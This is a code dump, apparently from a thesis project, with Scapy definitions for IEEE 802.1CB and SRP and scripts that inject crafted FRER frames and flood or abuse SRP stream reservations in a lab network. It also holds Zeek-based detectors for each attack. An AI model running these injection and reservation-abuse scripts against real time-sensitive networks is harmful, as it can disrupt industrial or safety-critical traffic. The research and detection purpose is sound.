                        StreamID(MacAddress="00:00:00:00:00:02", UniqueID=108),
                        StreamRank(),
                        TrafficSpecification(),
                        UserToNetworkRequirements()
                    ]
                ),
                Status(
                    tlvlist=[
                        StatusInfo(),
                        AccumulatedLatency()
                    ]
                ),
            ]
        ))
    send_srp(frames)
    # send many SRP reservations in a short time for same StreamID


# Attack 8 - Allocated but unused resources - Done
def attack8():
    """ Sends a single SRP reservation and waits until timeout occurs """
    # No need to fill out complete message, as it just creates an entry for streamID config
    srp_frame = SRP(
        tlvlist=[
            Talker(
                tlvlist=[
                    StreamID(MacAddress="00:00:00:00:00:02", UniqueID=99),
                    StreamRank(),
                    TrafficSpecification(),
                    UserToNetworkRequirements()
                ]
            ),
            Status(
                tlvlist=[
                    StatusInfo(),
                    AccumulatedLatency()
                ]
            ),
        ]
    )
    send_srp(srp_frame)
    time.sleep(60)
    # send srp msg, reserving resources, wait ???unused or far under reserved bandwidth


# Attack 9 - Violating SRP resource allocation restricted by a threshold
def attack9():
    pass
    # ???What kind of threshold for which values???


# Attack 10 - Logging SRP resource allocation deviating from previous allocations so much. Not SRP but Netconf
# SRP handles mostly requests and answers.
def attack10():
    pass
    # ???Compare to last msg for same StreamID? or compare to current configuration???
    # Are there relevant data points that are not allowed to change?
    # In case of failed SRP request CUC could reform requirements
    # So only if accepted Request gets changed again?


# Attack 11 - Inconsistencies between SRP QoS requirements with reserved CB paths
def attack11():
    pass
    # ???What? Like it uses less than what it says it needs? can it even use more, when bridges are configured?
    # Does a bridge guarantee at least n mb/s or are there upper bounds???


# Attack 12 - Violating link capacity for certain traffic type
def attack12():
    pass
    # ???not sure on how I would measure that???


# Attack 13 - Attempts for changing an existing resource allocation for a certain stream
def attack13():
    pass
    # send SRP msg with config
    # send SRP msg with config for the same streamID
    # This would be the same as attack 10
    # Keep track of state/ keeping old msgs would be easier and make StreamID key


if __name__ == "__main__":
    # prepare stuff here
    interact(mydict=globals(), mybanner="Test add-on TSN")


==> software/software/CB.py <==
#!/usr/bin/env python3

# -----------------------------------------------------------
#
#  cb.py --- IEEE 802.1CB Frame Replication and Elimination for Reliability (FRER) support for Scapy
#
# (C) 2022 Robin Schenderlein, Hamburg, Germany
# Released under GNU Public License (GPL)
# email robin.schenderlein@studium.uni-hamburg.de
# -----------------------------------------------------------

# scapy.contrib.description = IEEE 802.1CB
# scapy.contrib.status = loads

import logging

from scapy.fields import ShortField
from scapy.layers.l2 import Dot1Q
from scapy.main import interact
from scapy.packet import Packet, bind_layers

logger = logging.getLogger("scapy")
logger.setLevel(logging.INFO)


class CB(Packet):
    name = "FRER"
    fields_desc = [ShortField("reserved", 0),
                   ShortField("sequence_nr", 0)]


bind_layers(Dot1Q, CB, type=0xf1c1)

if __name__ == "__main__":
    interact(mydict=globals(), mybanner="Test add-on TSN")


==> software/software/SRP.py <==
#!/usr/bin/env python3

# -----------------------------------------------------------
#
#  srp.py --- IEEE 802.1Qcc Enhancements to SRP support for Scapy
#
# (C) 2022 Robin Schenderlein, Hamburg, Germany
# Released under GNU Public License (GPL)
# email robin.schenderlein@studium.uni-hamburg.de
# -----------------------------------------------------------

# scapy.contrib.description = IEEE 802.1Qcc
# scapy.contrib.status = loads

import logging

from scapy.config import conf
from scapy.fields import ShortField, MACField, BitField, ByteField, IntField, IPField, IP6Field, \
    ByteEnumField, FieldLenField, FieldListField, StrLenField, PacketListField
from scapy.layers.l2 import Ether
from scapy.main import interact
from scapy.packet import Packet, bind_layers

logger = logging.getLogger("scapy")
logger.setLevel(logging.INFO)

talkerStatus = {
    0: "None",
    1: "Ready",
    2: "Failed"
}

listenerStatus = {
    0: "None",
    1: "Ready",
    2: "PartialFailed",
    3: "Failed"
}


class SrpGenericTlv(Packet):
    name = "SRP Generic TLV"
    fields_desc = [ByteField("TLV_type", 0),
                   FieldLenField("TLV_length", None, length_of="value", fmt="B"),
                   StrLenField("value", b'', length_from=lambda x: x.TLV_length)
                   ]

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        if _pkt and len(_pkt) >= 2:
            t = _pkt[:1][0]
            cls = _SRP_TLV_CLS.get(t, "DtpGenericTlv")
        return cls

    def guess_payload_class(self, p):
        return conf.padding_layer


class SrpGenericDataFrameSpecTlv(SrpGenericTlv):
    name = "SRP Generic DataFrameSpec TLV"


class Talker(SrpGenericTlv):
    name = "Talker"
    fields_desc = [ByteField("TLV_type", 1),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class StreamID(SrpGenericTlv):
    name = "StreamID"
    fields_desc = [ByteField("TLV_type", 2),
                   ByteField("TLV_length", 8),
                   MACField("MacAddress", "00:00:00:00:00:00"),
                   ShortField("UniqueID", 0)]


class StreamRank(SrpGenericTlv):
    name = "StreamRank"
    fields_desc = [ByteField("TLV_type", 3),
                   ByteField("TLV_length", 1),
                   BitField("reserved", 0, 7),
                   BitField("Rank", 1, 1)]


class InterfaceID(SrpGenericTlv):
    name = "Interface_ID"
    fields_desc = [ByteField("TLV_type", 5),
                   FieldLenField("TLV_length", None, length_of="InterfaceName", fmt="B", adjust=lambda pkt, x: x + 6),
                   MACField("MacAddress", "00:00:00:00:00:00"),
                   StrLenField("InterfaceName", b'', length_from=lambda x: x.TLV_length - 6)]


class EndStationInterfaces(SrpGenericTlv):
    name = "EndStationInterfaces"
    fields_desc = [ByteField("TLV_type", 4),
                   FieldLenField("TLV_length", None, length_of="interfaces", fmt="B"),
                   PacketListField("interfaces", None, InterfaceID, length_from=lambda x: x.TLV_length)
                   ]


class IEEE802MacAddresses(SrpGenericTlv):
    name = "IEEE802MacAddresses"
    fields_desc = [ByteField("TLV_type", 7),
                   ByteField("TLV_length", 12),
                   MACField("DestinationMacAddress", "00:00:00:00:00:00"),
                   MACField("SourceMacAddress", "00:00:00:00:00:00")]


class IEEE802VlanTag(SrpGenericTlv):
    name = "IEEE802VlanTag"
    fields_desc = [ByteField("TLV_type", 8),
                   ByteField("TLV_length", 12),
                   ByteField("PriorityCodePoint", 0),
                   ShortField("VlanId", 0)]


class IPv4tuple(SrpGenericTlv):
    name = "IPv4tuple"
    fields_desc = [ByteField("TLV_type", 9),
                   ByteField("TLV_length", 15),
                   IPField("SourceIpAddress", "0.0.0.0"),
                   IPField("DestinationIpAddress", "0.0.0.0"),
                   ByteField("Dscp", 0),
                   ShortField("Protocol", 0),
                   ShortField("SourcePort", 0),
                   ShortField("DestinationPort", 0)]


class IPv6tuple(SrpGenericTlv):
    name = "IPv6tuple"
    fields_desc = [ByteField("TLV_type", 10),
                   ByteField("TLV_length", 39),
                   IP6Field("SourceIpAddress", "::"),
                   IP6Field("DestinationIpAddress", "::"),
                   ByteField("Dscp", 0),
                   ShortField("Protocol", 0),
                   ShortField("SourcePort", 0),
                   ShortField("DestinationPort", 0)]


class DataFrameSpecification(SrpGenericTlv):
    name = "DataFrameSpecification"
    fields_desc = [ByteField("TLV_type", 6),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class TrafficSpecification(SrpGenericTlv):
    name = "TrafficSpecification"
    fields_desc = [ByteField("TLV_type", 11),
                   ByteField("TLV_length", 13),
                   IntField("IntervalNumerator", 0),
                   IntField("IntervalDenominator", 1),
                   ShortField("MaxFramesPerInterval", 0),
                   ShortField("MaxFrameSize", 0),
                   ByteField("TransmissionSelection", 0)]


class TSpecTimeAware(SrpGenericTlv):
    name = "TSpecTimeAware"
    fields_desc = [ByteField("TLV_type", 12),
                   ByteField("TLV_length", 12),
                   IntField("EarliestTransmitOffset", 0),
                   IntField("LatestTransmitOffset", 0),
                   IntField("Jitter", 0)]


class UserToNetworkRequirements(SrpGenericTlv):
    name = "UserToNetworkRequirements"
    fields_desc = [ByteField("TLV_type", 13),
                   ByteField("TLV_length", 5),
                   ByteField("NumSeamlessTrees", 0),
                   IntField("MaxLatency", 0)]


class InterfaceCapabilities(SrpGenericTlv):
    name = "InterfaceCapabilities"
    fields_desc = [ByteField("TLV_type", 14),
                   FieldLenField("TLV_length", None, length_of="CBStreamIdenTypeList", fmt="B",
                                 adjust=lambda pkt, val: val + len(pkt.CBSequenceTypeList) * 4 + 3),
                   BitField("reserved", 0, 7),
                   BitField("VlanTagCapable", 1, 1),
                   FieldLenField("NumITL", None, fmt="B", count_of="CBStreamIdenTypeList"),
                   FieldLenField("NumSTL", None, fmt="B", count_of="CBSequenceTypeList"),
                   FieldListField("CBStreamIdenTypeList", [], IntField("CB-StreamIdenType", 0),
                                  count_from=lambda pkt: pkt.NumITL),
                   FieldListField("CBSequenceTypeList", [], IntField("CB-SequenceType", 0),
                                  count_from=lambda pkt: pkt.NumSTL)]


class Listener(SrpGenericTlv):
    name = "Listener"
    fields_desc = [ByteField("TLV_type", 15),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class Status(SrpGenericTlv):
    name = "Status"
    fields_desc = [ByteField("TLV_type", 16),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class StatusInfo(SrpGenericTlv):
    name = "StatusInfo"
    fields_desc = [ByteField("TLV_type", 17),
                   ByteField("TLV_length", 3),
                   ByteEnumField("TalkerStatus", 0, talkerStatus),
                   ByteEnumField("ListenerStatus", 0, listenerStatus),
                   ByteField("FailureCode", 0)]


class AccumulatedLatency(SrpGenericTlv):
    name = "AccumulatedLatency"
    fields_desc = [ByteField("TLV_type", 18),
                   ByteField("TLV_length", 4),
                   IntField("AccumulatedLatency", 0)]


class TimeAwareOffset(SrpGenericTlv):
    name = "TimeAwareOffset"
    fields_desc = [ByteField("TLV_type", 20),
                   ByteField("TLV_length", 4),
                   IntField("TimeAwareOffset", 0)]


class InterfaceConfiguration(SrpGenericTlv):
    name = "InterfaceConfiguration"
    fields_desc = [ByteField("TLV_type", 19),
                   FieldLenField("TLV_length", None, length_of="tlvlist", fmt="B"),
                   PacketListField("tlvlist", [], SrpGenericTlv, length_from=lambda x: x.TLV_length)]


class FailedInterfaces(SrpGenericTlv):
    name = "FailedInterfaces"
    fields_desc = [ByteField("TLV_type", 21),
                   FieldLenField("TLV_length", None, length_of="interfaces", fmt="B"),
                   PacketListField("interfaces", None, InterfaceID, length_from=lambda x: x.TLV_length)
                   ]


_SRP_TLV_CLS = {
    1: Talker,
    2: StreamID,
    3: StreamRank,
    4: EndStationInterfaces,
    5: InterfaceID,
    6: DataFrameSpecification,
    7: IEEE802MacAddresses,
    8: IEEE802VlanTag,
    9: IPv4tuple,
    10: IPv6tuple,
    11: TrafficSpecification,
    12: TSpecTimeAware,
    13: UserToNetworkRequirements,
    14: InterfaceCapabilities,
    15: Listener,
    16: Status,
    17: StatusInfo,
    18: AccumulatedLatency,
    19: InterfaceConfiguration,
    20: TimeAwareOffset,
    21: FailedInterfaces
}


class SRP(Packet):
    name = "SRP"
    fields_desc = [PacketListField("tlvlist", [], SrpGenericTlv)]


bind_layers(Ether, SRP, type=0x22ea)

if __name__ == "__main__":
    interact(mydict=globals(), mybanner="Test add-on TSN")

    # TODO Hardcode length of fields vs calculation for types with fixed length


==> software/software/attack-detection.py <==
#!/usr/bin/env python3
import sys
import broker
import time
from collections import OrderedDict

from BitVector import BitVector
from pprint import pprint

streams = dict()
streams_counted_frames = dict()
frer_history_size = 2
nr_of_member_streams = 5


def on_SRP_DATA_INDICATION(data):
    pass


def identify_null_stream(destination_address, vlan_identifier):
    return (str(destination_address) + str(vlan_identifier)).__hash__()


def identify_source_vlan_stream(source_address, vlan_identifier):
    return (str(source_address) + str(vlan_identifier)).__hash__()


def identify_ip_stream(destination_address, vlan_identifier, ip_src_addr, ip_dest_addr, dscp, ip_next_port, src_port,
                       dest_port):
    return (str(destination_address) + str(vlan_identifier) + str(ip_src_addr) + str(ip_dest_addr) + str(dscp) + str(
        ip_next_port) + str(src_port) + str(dest_port)).__hash__()


def on_CB_DATA_INDICATION(data):
    ethernet_data = data[0][0]
    cb_data = data[1]
    src, dst, vlan = ethernet_data[3:6]
    sequence_nr = cb_data.value
    stream_id = identify_source_vlan_stream(src, vlan)
    print(f'stream id: {stream_id}, sequence nr: {sequence_nr}')
    # ------Attack detection------
    # Attack 1 - More frames for compound stream than member streams
    if stream_id not in streams_counted_frames:
        streams_counted_frames[stream_id] = OrderedDict()
        pprint(streams_counted_frames)
    if sequence_nr not in streams_counted_frames[stream_id]:
        streams_counted_frames[stream_id][sequence_nr] = 0
    streams_counted_frames[stream_id][sequence_nr] += 1
    if streams_counted_frames[stream_id][sequence_nr] > nr_of_member_streams:
        print("NOTICE got more frames for compound stream then expected")
    if len(streams_counted_frames[stream_id]) > (frer_history_size * 2):
        streams_counted_frames[stream_id].popitem(False)  # remove oldest entry
    # Attack 2 - Trigger RECOVERY TIMEOUT
    # Attack 3 - Changes in inter-arrival time
    # Attack 4 - Detect intersecting paths configurations
    # Attack 7 - Too many stream reservations ins short time
    # Attack 9 - Violating SRP resource allocation restricted by a threshold
    # Attack 10 - Logging SRP resource allocation deviating from previous allocations so much
    # Attack 11 - Violating inter-arrival...
    # Attack 12 - Violating link capacity for certain traffic type
    # Attack 13 - Attempts for changing an existing resource allocation for a certain stream
    # Attack 14 - Inconsistencies between SRP QoS requirements with reserved CB paths
    # Attack 15 - out of order frame for match recovery
    #
    #
    # -----Add to new state-----
    # Simplified Stream Recovery function
    if stream_id not in streams:
        streams[stream_id] = [sequence_nr, BitVector(size=frer_history_size)]
        streams[stream_id][1][0] = 1  # mark
        # process PRESENT_DATA
        return

    latest_valid = streams[stream_id][0]
    valid_range = range(latest_valid - frer_history_size, latest_valid + frer_history_size)
    if sequence_nr in valid_range:  # frame is in valid range
        delta = sequence_nr - latest_valid
        history = streams[stream_id][1]
        if sequence_nr <= latest_valid:  # old frame
            if 0 == history[delta]:  # has not been seen yet
                # add frame_counter[stream_id]=last_seen_counted[]
                # process PRESENT_DATA & reset RemainingTicks
                pass
            else:
                # discard
                pass
        else:  # frame is ahead
            if delta != 1:  # exactly one ahead
                # could raise a notice here: raise_notice(out of order, accepted frame)
                print("NOTICE out of order frame accepted")
                pass
            history.shift_right(delta)
            history[0] = 1
            streams[stream_id][0] = sequence_nr
            # reset RemainingTicks
            # process PRESENT_DATA
    else:
        pass
        print("NOTICE out of order frame discarded")
        # could raise a notice here: raise_notice(out of order, discarded frame)


# Zeek Broker
# Setup endpoint and connect to Zeek.
ep = broker.Endpoint()
sub = ep.make_subscriber("/topic/tsn")
ss = ep.make_status_subscriber(True)
ep.peer("127.0.0.1", 9999)
# Wait until connection is established.
st = ss.get()

if not (type(st) == broker.Status and st.code() == broker.SC.PeerAdded):
    print("could not connect")
    sys.exit(1)
print("Connected to publisher")

while True:
    time.sleep(0.5)
    poll_result = sub.poll()
    # do stuff like checking counter
    # Attack 5 - All member streams dead
    # Attack 6 - Death of member stream
    # Attack 8 - Allocated but unused resources
    #
    #
    if not poll_result:
        continue
    for (topic, data) in poll_result:
        event = broker.zeek.Event(data)
        if topic == "/topic/tsn/cb":
            on_CB_DATA_INDICATION(event.args())
        elif topic == "/topic/tsn/srp/talker_enhanced":
            on_SRP_DATA_INDICATION(data)
        elif topic == "/topic/tsn/srp/listener_enhanced":
            pass

    # ping = broker.zeek.Event("ping", n)
    # ep.publish("/topic/test", ping)

    # How to:
    #
    # On new message:
    #   Does attack cause notice A
    #   Does attack cause notice B
    #   Does attack cause notice C
    #   etc.
    #   is the message accepted
    #       yes -> add to new state
    #       no  -> keep msg for relevant attacks (would need to be cleared after some time)


==> software/software/attack1.py <==
def attack1(interface_name="h2-eth0"):
    nr_of_msgs = 3
    global sequence_nr
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr)  # packet added by attacker
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)

==> software/software/attack2.py <==
def send_cb_timed(jitter, first_delay, delays, start_time, interface_name):
    global sequence_nr
    has_jitter = bool(random.getrandbits(1))
    if has_jitter:
        time.sleep(jitter)
    time.sleep(first_delay)
    send_cb(interface_name, sequence_nr)
    for delay in delays:
        time.sleep(delay)
        send_cb(interface_name, sequence_nr)
    sequence_nr += 1
    time.sleep(1 - ((time.time() - start_time) % 1)) 

def attack2(transmission_latencies=None, jitter=None, changing_packet=0, delta=0, interface_name="h2-eth0"):
    nr_of_emissions = 20
    if transmission_latencies is None:
        transmission_latencies = [0, 0, 0.1, 0.1, 0.2]
    transmission_latencies.sort()
    delays = np.diff(transmission_latencies)
    if jitter is None:
        jitter = 0.1 * 1
    time.sleep(1 - time.time() % 1)  # try to get same start over restart
    start_time = time.time().__floor__()
    for _ in range(nr_of_emissions):
        send_cb_timed(jitter, transmission_latencies[0], delays, start_time, interface_name)
    transmission_latencies[changing_packet] += delta
    transmission_latencies.sort()
    delays = np.diff(transmission_latencies)
    for _ in range(nr_of_emissions):
        send_cb_timed(jitter, transmission_latencies[0], delays, start_time, interface_name)


==> software/software/attack3.py <==
def attack3(delta=50, interface_name="h2-eth0"):
    """attack3 - Sends a continuous flow of FRER packets, but one packet is out of order.
    :param interface_name: Optional interface name, that should be used to send a frame
    :param delta: Optional offset for the out-of-order packet. Defaults to 50"""
    global sequence_nr
    nr_of_msgs = 3
    print(f'Sends {nr_of_member_streams} member streams and after incrementing the sequence number {nr_of_msgs} times '
          f' one messages has a different sequence number. The flow continues for {nr_of_member_streams} iterations.')
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr, nr_of_member_streams - 1)
    send_cb(interface_name, sequence_nr + delta)
    sequence_nr += 1
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)

==> software/software/attack4.py <==
def attack4(interface_name="h2-eth0"):
    global sequence_nr
    start_time = time.time()
    for i in range(nr_of_member_streams, 0, -1):
        for _ in range(5):
            send_cb(interface_name, sequence_nr, i)
            sequence_nr += 1
            time.sleep(1 - ((time.time() - start_time) % 1.0))

==> software/software/attack5.py <==
def attack5(interval_numerator=360, interval_denominator=1, max_frames_per_interval=65535, max_frame_size=65535):
    send_srp(create_srp_frame(interval_numerator=interval_numerator,
                              interval_denominator=interval_denominator,
                              max_frames_per_interval= max_frames_per_interval,
                              max_frame_size=max_frame_size))

==> software/software/attack6.py <==
def attack6(interval_numerator=10, interval_denominator=1, max_frames_per_interval=1, max_frame_size=200,
            interval_numerator_atk=10, interval_denominator_atk=1, max_frames_per_interval_atk=1,
            max_frame_size_atk=300, ):
    for i in range(5):
        send_srp(create_srp_frame(interval_numerator=interval_numerator,
                                  interval_denominator=interval_denominator,
                                  max_frames_per_interval= max_frames_per_interval,
                                  max_frame_size=max_frame_size * 2,
                                  unique_id=200 + i))
    for i in range(5):
        send_srp(create_srp_frame(interval_numerator=interval_numerator,
                                  interval_denominator=interval_denominator,
                                  max_frames_per_interval= max_frames_per_interval,
                                  max_frame_size=int(max_frame_size / 2),
                                  unique_id=205 + i))
    send_srp(create_srp_frame(interval_numerator=interval_numerator_atk,
                              interval_denominator=interval_denominator_atk,
                              max_frames_per_interval= max_frames_per_interval_atk,
                              max_frame_size=max_frame_size_atk,
                              unique_id=300))


==> software/software/attack7.py <==
def attack7(nr_of_requests=10, time_window=10):
    for i in range(100, 100 + nr_of_requests):
        send_srp(create_srp_frame(unique_id=200 + i))
        time.sleep(time_window / nr_of_requests)

==> software/software/attack8.py <==
def attack8(interval_numerator=1, interval_denominator=1, max_frames_per_interval=1, max_frame_size=800,
            interval_numerator_changed=1, interval_denominator_changed=1, max_frames_per_interval_changed=1,
            max_frame_size_changed=800):
    unique_id = 888
    send_srp(create_srp_frame(interval_numerator=interval_numerator,
                              interval_denominator=interval_denominator,
                              max_frames_per_interval= max_frames_per_interval,
                              max_frame_size=max_frame_size,
                              unique_id=unique_id))

    send_srp(create_srp_frame(interval_numerator= interval_numerator_changed,
                              interval_denominator= interval_denominator_changed,
                              max_frames_per_interval= max_frames_per_interval_changed,
                              max_frame_size=max_frame_size_changed,
                              unique_id=unique_id))

==> software/software/attack9.py <==
def attack9():
    send_srp(create_srp_frame())
    time.sleep(timeout)

==> software/software/control-plane-broker.py <==
ep = broker.Endpoint()
sub = ep.make_subscriber("/topic/tsn")
ss = ep.make_status_subscriber(True)
ep.peer("127.0.0.1", 9999)
# Wait until connection is established.
st = ss.get()

if not (type(st) == broker.Status and st.code() == broker.SC.PeerAdded):
    print("Could not connect")
    sys.exit(1)
print("Connected to publisher")

while True:
    time.sleep(0.5)
    poll_result = sub.poll()
    # Check for timeouts or unused resources
    if not poll_result:
        continue
    for (topic, data) in poll_result:
        event = broker.zeek.Event(data)
        if topic == "/topic/tsn/cb":
            on_CB_DATA_INDICATION(event.args())
        elif topic == "/topic/tsn/srp/talker_enhanced":
            on_SRP_DATA_INDICATION(data)
        elif topic == "/topic/tsn/srp/listener_enhanced":
            pass

==> software/software/detect-attack1.py <==
def check_attack1(stream_id, sequence_nr):
    if stream_id not in streams_history:
        streams_history[stream_id] = OrderedDict()
    if sequence_nr not in streams_history[stream_id]:
        streams_history[stream_id][sequence_nr] = [0, -1]
    streams_history[stream_id][sequence_nr][0] += 1
    streams_history[stream_id][sequence_nr][1] = time.time()
    if streams_history[stream_id][sequence_nr][0] > nr_of_member_streams:
        publish_notice(f'Got more frames for compound stream {stream_id} then expected')

==> software/software/detect-attack4.py <==
def check_attack4():
    delete_streams = []
    for stream_id, stream_history in streams_history.items():
        while True:
            sequence_nr_count, sequence_nr_ts = next(iter(stream_history.values()))
            if (time.time() - sequence_nr_ts) > timeout:
                if sequence_nr_count < nr_of_member_streams:
                    nr_of_dead_streams = nr_of_member_streams - sequence_nr_count
                    if stream_id not in streams_with_death or streams_with_death[stream_id] != nr_of_dead_streams:
                        streams_with_death[stream_id] = nr_of_dead_streams
                        publish_notice(f'{nr_of_dead_streams} member stream[s] of stream {stream_id} are '
                                       'probably dead')
                stream_history.popitem(False)  # remove oldest entry
                if not stream_history:
                    publish_notice(f'All member streams of stream {stream_id} are probably dead')
                    delete_streams.append(stream_id)
                    break
            else:
                break
    for stream_id in delete_streams:
        streams_history.pop(stream_id)

==> software/software/detect-attack5.py <==
def check_attack5(interval, max_frames_per_interval, max_frame_size, stream_id):
    if interval > interval_threshold:
        publish_notice(f'Threshold for Interval exceeded for stream {stream_id}: \n'
                       f'Allowed: {interval_threshold} Requested: {interval}')
    if max_frames_per_interval > max_frames_per_interval_threshold:
        publish_notice(f'Threshold for MaxFramesPerInterval exceeded for stream {stream_id}: \n'
                       f'Allowed: {max_frames_per_interval_threshold} Requested: {max_frames_per_interval}')
    if max_frame_size > max_frame_size_threshold:
        publish_notice(f'Threshold for MaxFrameSize exceeded for stream {stream_id}: \n'
                       f'Allowed: {max_frame_size_threshold} Requested: {max_frame_size}')

==> software/software/detect-attack6.py <==

def check_attack6(interval, max_frames_per_interval, max_frame_size, stream_id):
    
    max_bandwidth = max_frame_size * max_frames_per_interval / interval  # byte/second
    
    if len(srp_bandwidth_history) == srp_bandwidth_history_len:
        std_deviation = np.std(srp_bandwidth_history)
        mean = np.mean(srp_bandwidth_history)
        low = mean - 2 * std_deviation
        high = mean + 2 * std_deviation
        
        if not low < max_bandwidth < high:
            publish_notice(f'SRP request with more than two standard deviations difference for bandwidth for '
                           f'stream id {stream_id}. \n Requested: {max_bandwidth} Mean: {mean}')
    
    srp_bandwidth_history.append(max_bandwidth)

==> software/software/detect-attack7.py <==
def cleanup_srp_history():
    current_time = time.time()
    while srp_history:
        if current_time - srp_history[0] > time_window_threshold:
            srp_history.popleft()
        else:
            return

def check_attack7(time_stamp):
    srp_history.append(time_stamp)
    cleanup_srp_history()
    if len(srp_history) > nr_of_requests_threshold:
        publish_notice(f'Too many SRP requests received in short time.')

==> software/software/detect-attack8.py <==
def check_attack8(mac, unique_id, stream_id):
    if mac not in srp_configs:
        srp_configs[mac] = dict()
    if unique_id not in srp_configs[mac]:
        srp_configs[mac][unique_id] = [time.time(), stream_id]
    else:
        publish_notice(f'SRP request for changing an existing resource allocation with config id {mac}{unique_id}.')

==> software/software/detect-attack9.py <==
def check_attack9():
    delete_configs = set()
    for talker_mac, talker_config in srp_configs.items():
        for unique_id, config in talker_config.items():
            # check if stream data has been received
            timestamp, stream_id = config
            if time.time() - timestamp > timeout:
                if stream_id not in streams_history:
                    publish_notice(f'For SRP request with stream id {stream_id} no FRER packet was received.')
                    delete_configs.add(talker_mac)
    for talker_mac in delete_configs:
        srp_configs.pop(talker_mac)

==> software/software/scapy-attacks.py <==
# scapy.contrib.status = skip
# scapy.contrib.name = TSN
# Set log level to benefit from Scapy warnings
import time

from scapy.layers.l2 import Dot1Q
from scapy.sendrecv import sendp

from CB import CB
from SRP import *

logger = logging.getLogger("scapy")
logger.setLevel(logging.INFO)

nr_of_member_streams = 2
sequence_nr = 0  # Does not matter where it starts, first msg is always TAKE_ANY


def send_cb(interface_name, sequence_nr, nr_of_packets=1, interval=0):
    packet = (Ether(src="00:00:00:00:00:02", dst=" 00:00:00:00:00:04") / Dot1Q(vlan=1000) / CB(sequence_nr=sequence_nr))
    sendp(packet, interface_name, count=nr_of_packets, inter=interval)
    # time between each packet is roughly 300 µs = 0.0003 seconds


def send_srp1(interface_name):
    srp_frame = SRP(
        tlvlist=[
            Talker(
                tlvlist=[
                    StreamID(MacAddress="00:00:00:00:00:02", UniqueID=1),
                    StreamRank(),
                    TrafficSpecification(),
                    UserToNetworkRequirements(NumSeamlessTrees=nr_of_member_streams)
                ]
            ),
            Status(
                tlvlist=[
                    StatusInfo(),
                    AccumulatedLatency()
                ]
            ),
        ]
    )
    packet = (Ether(src="00:00:00:00:00:02", dst="00:00:00:00:00:04") / Dot1Q(vlan=1000) / srp_frame)
    sendp(packet, interface_name)


def send_srp(srp_frame, interface_name="h2-eth0"):
    if isinstance(srp_frame, list):
        packet = []
        for frame in srp_frame:
            packet.append(Ether(src="00:00:00:00:00:02", dst="00:00:00:00:00:04") / Dot1Q(vlan=1000) / frame)
    else:
        packet = (Ether(src="00:00:00:00:00:02", dst="00:00:00:00:00:04") / Dot1Q(vlan=1000) / srp_frame)
    sendp(packet, interface_name)


def list_attacks():
    print(attack1.__doc__)
    print(attack2.__doc__)
    print(attack3.__doc__)
    print(attack4.__doc__)
    print(attack5.__doc__)
    print(attack6.__doc__)
    print(attack7.__doc__)
    print(attack8.__doc__)
    print(attack9.__doc__)
    print(attack10.__doc__)
    print(attack11.__doc__)
    print(attack12.__doc__)
    print(attack13.__doc__)


# Attack 1 - Done
def attack1(interface_name="h2-eth0"):
    """ attack1 - Send more frames for compound stream than member streams """
    nr_of_msgs = 3
    global sequence_nr
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr)  # packet added by attacker, originator does not matter for now
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)


# Attack 2 - Done
def attack2(interface_name="h2-eth0"):
    """ attack2 - Trigger RECOVERY TIMEOUT by stopping all member streams of compound stream """
    global sequence_nr
    start_time = time.time()
    for _ in range(5):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))  # schedule close as possible to 1 sec
    print("Wait 1 minute")
    time.sleep(60)  # not really required
    # Does not really matter if streams die over time or all at once
    # send msgs, stop all, wait time   ???send only one message, do not alert if multiple same msgs arrive???


# Attack 3 - Changes in inter-arrival time - Done
def attack3(interface_name="h2-eth0"):
    """ Send flow of FRER packets, but one packet has a change in inter-arrival time """
    global sequence_nr
    start_time = time.time()
    for _ in range(5):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1 - ((time.time() - start_time) % 1.0))  # schedule close as possible to 1 sec
    send_cb(interface_name, sequence_nr, nr_of_member_streams-1)
    time.sleep(0.1)
    send_cb(interface_name, sequence_nr, 1)  # msg with other inter-arrival time
    sequence_nr += 1
    for i in range(5):
        time.sleep(1 - ((time.time() - start_time) % 1.0))
        send_cb(interface_name, sequence_nr + i, nr_of_member_streams)
        sequence_nr += 1


# Attack 4 - Detect intersecting paths configurations or loops?
def attack4():
    pass
    # If there is a CNC the CNC is responsible to create paths. It should be smart enough not to create loops or weird
    # intersections. Only at point where it is not otherwise possible. Same for distributed systems
    # Finding loops or intersections would require getting configuration of each bridge in the system via NETCONF
    # or whatever.
    # Not really focus of this thesis, as SRP requests does not include actual paths


# Attack 5 - Done
def attack5(interface_name="h2-eth0"):
    """ Sends a continuous flow of FRER packets, but one packet is out of order """
    # send FRER frame
    # send FRER frame with inconsistent sequence nr
    global sequence_nr
    nr_of_msgs = 3
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)
    send_cb(interface_name, sequence_nr + 50, nr_of_msgs, 1)
    sequence_nr += 1
    for _ in range(nr_of_msgs):
        send_cb(interface_name, sequence_nr, nr_of_member_streams)
        sequence_nr += 1
        time.sleep(1)


# Attack 6 - Done
def attack6(interface_name="h2-eth0"):
